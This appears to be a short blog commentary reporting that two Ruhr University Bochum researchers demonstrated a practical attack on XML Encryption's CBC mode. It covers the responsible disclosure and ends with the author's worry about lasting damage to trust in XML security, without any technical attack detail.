Extensible Markup Language or XML is the industry standard for storing and transporting data. A fundamental web services component, it allows content to be processed and exchanged across different applications, hardware, and operating systems with minimal human intervention. XML encryption was standardized by the World Wide Web Consortium (W3C) in 2002, and is used by major companies such as Microsoft and IBM in their XML frameworks.
Two researchers from the Ruhr University Bochum recently demonstrated that the XML encryption standard is not totally secure after all. They demonstrated a practical attack against XML’s cipher block chaining (CBC) mode. The attack was tested against a popular open source implementation of XML encrytion, as well as against the implementations of companies that responded to the responsible disclosure. The result: the attack works, XML Encryption is not secure.
So how do we fix this issue? Unfortunately there seems to be no simple patch to fix this problem. The researchers propose to change the standard at the earliest. They have informed all possibly affected companies and have also had intensive discussions on workarounds with a few of them.
Given the magnitude of above news and the number of companies involved, there may be a fix soon. Nevertheless this has done “lasting damage” to distributed computing. It’s going to be “Hello IBM! bye bye silicon valley”. This may sound alarmist, but when the security infrastructure and that too a “security standard” which was supposedly verified/checked is broken, then it’s going to do damage. My sense of security with XML/HTTP technologies has certainly diminished after this event.